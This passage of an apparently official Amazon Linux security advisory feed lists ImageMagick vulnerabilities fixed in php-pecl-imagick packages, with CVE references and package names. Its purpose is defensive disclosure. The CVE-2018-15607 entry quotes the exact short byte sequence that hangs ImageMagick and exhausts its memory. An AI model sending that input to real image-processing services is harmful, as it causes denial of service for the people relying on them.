href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-pecl-imagick" version="3.4.4" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-3.4.4-2.15.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-2.15.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-2.15.amzn1.i686.rpm</filename></package><package name="php55-pecl-imagick" version="3.4.4" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-3.4.4-2.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1813</id><title>Amazon Linux AMI 
2014.03 - ALAS-2023-1813: medium priority package update for php70-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code on the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
coders/mat.c in ImageMagick 7.0.8-43 Q16 allows remote attackers to cause a denial of service (use-after-free and application crash) or possibly have unspecified other impact by crafting a Matlab image file that is mishandled in ReadImage in MagickCore/constitute.c.
CVE-2019-15139:
The XWD image (X Window System window dumping file) parsing component in ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (application crash resulting from an out-of-bounds Read) in ReadXWDImage in coders/xwd.c by crafting a corrupted XWD image file, a different vulnerability than CVE-2019-11472.
CVE-2019-14981:
In ImageMagick 7.x before 7.0.8-41 and 6.x before 6.9.10-41, there is a divide-by-zero vulnerability in the MeanShiftImage function. It allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-14980:
In ImageMagick 7.x before 7.0.8-42 and 6.x before 6.9.10-42, there is a use after free vulnerability in the UnmapBlob function that allows an attacker to cause a denial of service by sending a crafted file.
CVE-2019-13454:
ImageMagick 7.0.8-54 Q16 allows Division by Zero in RemoveDuplicateLayers in MagickCore/layer.c.
CVE-2019-13311:
A flaw was found in ImageMagick, containing memory leaks of AcquireMagickMemory due to a wand/mogrify.c error. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). An attacker could abuse this flaw by providing a specially crafted image and cause a denial of service by using all available memory. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash.
CVE-2019-13310:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to an error found in MagickWand/mogrify.c. It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the function MogrifyImageList(). Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a denial of service by using all available memory.
CVE-2019-13309:
A flaw was found in ImageMagick version 7.0.8-50 Q16, containing memory leaks of AcquireMagickMemory due to the mishandling of the NoSuchImage error in CLIListOperatorImages in MagickWand/operation.c. It was discovered that ImageMagick does not properly release acquired memory in the function MogrifyImageList() when some error conditions are met, or when the "compare" option is used. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a denial of service by using all available memory.
CVE-2019-13307:
A heap-based buffer overflow was discovered in ImageMagick in the way it parses images when using the evaluate-sequence option. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13306:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13305:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced strncpy and off-by-one errors. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13304:
A stack-based buffer overflow was discovered in ImageMagick in the way it writes PNM images due to a misplaced assignment. Applications compiled against ImageMagick libraries that accept untrustworthy images or write PNM images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13301:
ImageMagick 7.0.8-50 Q16 has memory leaks in AcquireMagickMemory because of an AnnotateImage error.
CVE-2019-13300:
A heap-based buffer overflow was discovered in ImageMagick in the way it applies a value with arithmetic, relational, or logical operators to an image due to mishandling columns. Applications compiled against ImageMagick libraries that accept untrustworthy images and use the evaluate-sequence option or function EvaluateImages may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or potentially execute code.
CVE-2019-13297:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood, due to mishandling of a height of zero. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13295:
A heap-based buffer over-read was discovered in ImageMagick in the way it selects an individual threshold for each pixel based on the range of intensity values in its local neighborhood, due to mishandling of a width of zero. Applications compiled against ImageMagick libraries that accept untrustworthy images may be vulnerable to this flaw. An attacker could abuse this flaw by providing a specially crafted image to make the application crash or leak application data.
CVE-2019-13135:
ImageMagick before 7.0.8-50 has a "use of uninitialized value" vulnerability in the function ReadCUTImage in coders/cut.c.
CVE-2019-13134:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadVIFFImage in coders/viff.c.
CVE-2019-13133:
ImageMagick before 7.0.8-50 has a memory leak vulnerability in the function ReadBMPImage in coders/bmp.c.
CVE-2019-12979:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the SyncImageSettings function in MagickCore/image.c. This is related to AcquireImage in magick/image.c.
CVE-2019-12978:
ImageMagick 7.0.8-34 has a "use of uninitialized value" vulnerability in the ReadPANGOImage function in coders/pango.c.
CVE-2019-12976:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the ReadPCLImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a denial of service by using all available memory.
CVE-2019-12975:
It was discovered that ImageMagick does not properly release acquired memory when some error conditions occur in the WriteDPXImage() function. Applications compiled against ImageMagick libraries that accept untrustworthy images may be exploited to use all available memory and make them crash. An attacker could abuse this flaw by providing a specially crafted image and cause a denial of service by using all available memory.
CVE-2019-12974:
A NULL pointer dereference in the function ReadPANGOImage in coders/pango.c and the function ReadVIDImage in coders/vid.c in ImageMagick 7.0.8-34 allows remote attackers to cause a denial of service via a crafted image.
CVE-2019-11598:
In ImageMagick 7.0.8-40 Q16, there is a heap-based buffer over-read in the function WritePNMImage of coders/pnm.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file. This is related to SetGrayscaleImage in MagickCore/quantize.c.
CVE-2019-11597:
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or possibly information disclosure via a crafted image file.
CVE-2019-11472:
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
CVE-2019-11470:
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
CVE-2019-10650:
In ImageMagick 7.0.8-36 Q16, there is a heap-based buffer over-read in the function WriteTIFFImage of coders/tiff.c, which allows an attacker to cause a denial of service or information disclosure via a crafted image file.
CVE-2019-10131:
An off-by-one read vulnerability was discovered in ImageMagick in the formatIPTCfromBuffer function in coders/meta.c. A local attacker may use this flaw to read beyond the end of the buffer or to crash the program.
CVE-2018-9133:
ImageMagick 7.0.7-26 Q16 has excessive iteration in the DecodeLabImage and EncodeLabImage functions (coders/tiff.c), which results in a hang (tens of minutes) with a tiny PoC file. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted tiff file.
CVE-2018-8804:
WriteEPTImage in coders/ept.c in ImageMagick 7.0.7-25 Q16 allows remote attackers to cause a denial of service (MagickCore/memory.c double free and application crash) or possibly have unspecified other impact via a crafted file.
CVE-2018-20467:
In coders/bmp.c in ImageMagick before 7.0.8-16, an input file can result in an infinite loop and hang, with high CPU and memory consumption. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-18544:
There is a memory leak in the function WriteMSLImage of coders/msl.c in ImageMagick 7.0.8-13 Q16, and the function ProcessMSLScript of coders/msl.c in GraphicsMagick before 1.3.31.
CVE-2018-16750:
In ImageMagick 7.0.7-29 and earlier, a memory leak in the formatIPTCfromBuffer function in coders/meta.c was found.
CVE-2018-16749:
In ImageMagick 7.0.7-29 and earlier, a missing NULL check in ReadOneJNGImage in coders/png.c allows an attacker to cause a denial of service (WriteBlob assertion failure and application exit) via a crafted file.
CVE-2018-16328:
In ImageMagick before 7.0.8-8, a NULL pointer dereference exists in the CheckEventLogging function in MagickCore/log.c.
CVE-2018-15607:
In ImageMagick 7.0.8-11 Q16, a tiny input file 0x50 0x36 0x36 0x36 0x36 0x4c 0x36 0x38 0x36 0x36 0x36 0x36 0x36 0x36 0x1f 0x35 0x50 0x00 can result in a hang of several minutes during which CPU and memory resources are consumed until ultimately an attempted large memory allocation fails. Remote attackers could leverage this vulnerability to cause a denial of service via a crafted file.
CVE-2018-14437:
ImageMagick 7.0.8-4 has a memory leak in parse8BIM in coders/meta.c.
CVE-2018-14436:
ImageMagick 7.0.8-4 has a memory leak in ReadMIFFImage in coders/miff.c.
CVE-2018-14435:
ImageMagick 7.0.8-4 has a memory leak in DecodeImage in coders/pcd.c.
CVE-2018-14434:
ImageMagick 7.0.8-4 has a memory leak for a colormap in WriteMPCImage in coders/mpc.c.
CVE-2018-13153:
A memory leak was discovered in ImageMagick in the XMagickCommand function in the animate.c file. An array of strings, named filelist, is allocated on the heap but not released if the function ExpandFilenames returns an error code.
CVE-2018-12600:
In ImageMagick 7.0.8-3 Q16, ReadDIBImage and WriteDIBImage in coders/dib.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-12599:
In ImageMagick 7.0.8-3 Q16, ReadBMPImage and WriteBMPImage in coders/bmp.c allow attackers to cause an out of bounds write via a crafted file.
CVE-2018-11656:
In ImageMagick 7.0.7-20 Q16 x86_64, a memory leak vulnerability was found in the function ReadDCMImage in coders/dcm.c, which allows attackers to cause a denial of service via a crafted DCM image file.
CVE-2018-10805:
ImageMagick version 7.0.7-28 contains a memory leak in ReadYCBCRImage in coders/ycbcr.c.
CVE-2018-10804:
ImageMagick version 7.0.7-28 contains a memory leak in WriteTIFFImage in coders/tiff.c.
CVE-2018-10177:
An infinite loop has been found in the way ImageMagick reads Multiple-image Network Graphics (MNG) data. An attacker could exploit this to cause a denial of service via a crafted MNG file.
CVE-2017-18273:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadTXTImage in coders/txt.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted image file that is mishandled in a GetImageIndexInList call.
CVE-2017-18271:
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-22, an infinite loop vulnerability was found in the function ReadMIFFImage in coders/miff.c, which allows attackers to cause a denial of service (CPU exhaustion) via a crafted MIFF image file.
CVE-2017-18254:
A memory leak vulnerability has been discovered in ImageMagick in the WriteGIFImage function of the coders/gif.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-18252:
An issue was discovered in ImageMagick 7.0.7. The MogrifyImageList function in MagickWand/mogrify.c allows attackers to cause a denial of service (assertion failure and application exit in ReplaceImageInList) via a crafted file.
CVE-2017-18251:
A memory leak vulnerability has been discovered in ImageMagick in the ReadPCDImage function of the coders/pcd.c file. An attacker could use this flaw to cause a denial of service via a crafted file.
CVE-2017-12806:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function format8BIM, which allows attackers to cause a denial of service.
CVE-2017-12805:
In ImageMagick 7.0.6-6, a memory exhaustion vulnerability was found in the function ReadTIFFImage, which allows attackers to cause a denial of service.
CVE-2017-11166:
The ReadXWDImage function in coders/xwd.c in ImageMagick 7.0.5-6 has a memory leak vulnerability that can cause memory exhaustion via a crafted length (number of color-map entries) field in the header of an XWD file.
CVE-2017-1000476:
In ImageMagick 7.0.7-12 Q16, a CPU exhaustion vulnerability was found in the function ReadDDSInfo in coders/dds.c, which allows attackers to cause a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000476" title="" id="CVE-2017-1000476" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11166" title="" id="CVE-2017-11166" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12805" title="" id="CVE-2017-12805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12806" title="" id="CVE-2017-12806" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18251" title="" id="CVE-2017-18251" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18252" title="" id="CVE-2017-18252" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18254" title="" id="CVE-2017-18254" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18271" title="" id="CVE-2017-18271" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18273" title="" id="CVE-2017-18273" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10177" title="" id="CVE-2018-10177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10804" title="" id="CVE-2018-10804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10805" title="" id="CVE-2018-10805" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11656" title="" id="CVE-2018-11656" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12599" title="" id="CVE-2018-12599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12600" title="" id="CVE-2018-12600" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13153" title="" id="CVE-2018-13153" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14434" title="" id="CVE-2018-14434" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14435" title="" id="CVE-2018-14435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14436" title="" id="CVE-2018-14436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14437" title="" id="CVE-2018-14437" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15607" title="" id="CVE-2018-15607" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16328" title="" id="CVE-2018-16328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16749" title="" id="CVE-2018-16749" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16750" title="" id="CVE-2018-16750" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18544" title="" id="CVE-2018-18544" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20467" title="" id="CVE-2018-20467" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8804" title="" id="CVE-2018-8804" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9133" title="" id="CVE-2018-9133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10131" title="" id="CVE-2019-10131" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10650" title="" id="CVE-2019-10650" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" title="" id="CVE-2019-11470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" title="" id="CVE-2019-11472" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" 
title="" id="CVE-2019-11597" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" title="" id="CVE-2019-11598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" title="" id="CVE-2019-12974" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" title="" id="CVE-2019-12975" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" title="" id="CVE-2019-12976" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" title="" id="CVE-2019-12978" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" title="" id="CVE-2019-12979" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13133" title="" id="CVE-2019-13133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13134" title="" id="CVE-2019-13134" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" title="" id="CVE-2019-13135" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" title="" id="CVE-2019-13295" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" title="" id="CVE-2019-13297" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" title="" id="CVE-2019-13300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" title="" id="CVE-2019-13301" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" title="" id="CVE-2019-13304" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" title="" id="CVE-2019-13305" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" title="" id="CVE-2019-13306" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" title="" id="CVE-2019-13307" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" title="" id="CVE-2019-13309" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13310" title="" id="CVE-2019-13310" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" title="" id="CVE-2019-13311" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" title="" id="CVE-2019-13454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14980" title="" id="CVE-2019-14980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" title="" id="CVE-2019-14981" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" title="" id="CVE-2019-15139" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" title="" id="CVE-2019-15140" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15141" title="" id="CVE-2019-15141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" title="" id="CVE-2019-16708" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16709" title="" id="CVE-2019-16709" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" title="" id="CVE-2019-16710" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" title="" id="CVE-2019-16711" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712" title="" id="CVE-2019-16712" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16713" title="" id="CVE-2019-16713" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17540" title="" id="CVE-2019-17540" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17541" title="" id="CVE-2019-17541" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19948" title="" id="CVE-2019-19948" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19949" title="" id="CVE-2019-19949" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7175" title="" id="CVE-2019-7175" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7397" title="" id="CVE-2019-7397" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7398" title="" id="CVE-2019-7398" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9956" title="" id="CVE-2019-9956" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-3.4.4-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1814</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1814: medium priority package update for php71-pecl-imagick</title><issued date="2023-08-21 12:14:00" /><updated date="2023-08-23 02:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9956:
In ImageMagick 7.0.8-35 Q16, there is a stack-based buffer overflow in the function PopHexPixel of coders/ps.c, which allows an attacker to cause a denial of service or code execution via a crafted image file.
CVE-2019-7398:
In ImageMagick before 7.0.8-25, a memory leak exists in WriteDIBImage in coders/dib.c.
CVE-2019-7397:
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
CVE-2019-7175:
In ImageMagick before 7.0.8-25, some memory leaks exist in DecodeImage in coders/pcd.c.
CVE-2019-19949:
An out-of-bounds read was discovered in ImageMagick when writing PNG images. An attacker may abuse this flaw to trick a victim user into downloading a malicious image file and running it through ImageMagick, causing the application to crash.
CVE-2019-19948:
A heap-based buffer overflow flaw was discovered in ImageMagick when writing SGI images with improper columns and rows properties. An attacker may trick a victim user into downloading a malicious image file and running it through ImageMagick, possibly executing code on the victim user's system.
CVE-2019-17541:
ImageMagick before 7.0.8-55 has a use-after-free in DestroyStringInfo in MagickCore/string.c because the error manager is mishandled in coders/jpeg.c.
CVE-2019-17540:
ImageMagick before 7.0.8-54 has a heap-based buffer overflow in ReadPSInfo in coders/ps.c.
CVE-2019-16713:
ImageMagick 7.0.8-43 has a memory leak in coders/dot.c, as demonstrated by PingImage in MagickCore/constitute.c.
CVE-2019-16712:
ImageMagick 7.0.8-43 has a memory leak in Huffman2DEncodeImage in coders/ps3.c, as demonstrated by WritePS3Image.
CVE-2019-16711:
ImageMagick 7.0.8-40 has a memory leak in Huffman2DEncodeImage in coders/ps2.c.
CVE-2019-16710:
ImageMagick 7.0.8-35 has a memory leak in coders/dot.c, as demonstrated by AcquireMagickMemory in MagickCore/memory.c.
CVE-2019-16709:
ImageMagick 7.0.8-35 has a memory leak in coders/dps.c, as demonstrated by XCreateImage.
CVE-2019-16708:
ImageMagick 7.0.8-35 has a memory leak in magick/xwindow.c, related to XCreateImage.
CVE-2019-15141:
WriteTIFFImage in coders/tiff.c in ImageMagick 7.0.8-43 Q16 allows attackers to cause a denial-of-service (application crash resulting from a heap-based buffer over-read) via a crafted TIFF image file, related to TIFFRewriteDirectory, TIFFWriteDirectory, TIFFWriteDirectorySec, and TIFFWriteDirectoryTagColormap in tif_dirwrite.c of LibTIFF. NOTE: this occurs because of an incomplete fix for CVE-2019-11597.
CVE-2019-15140:
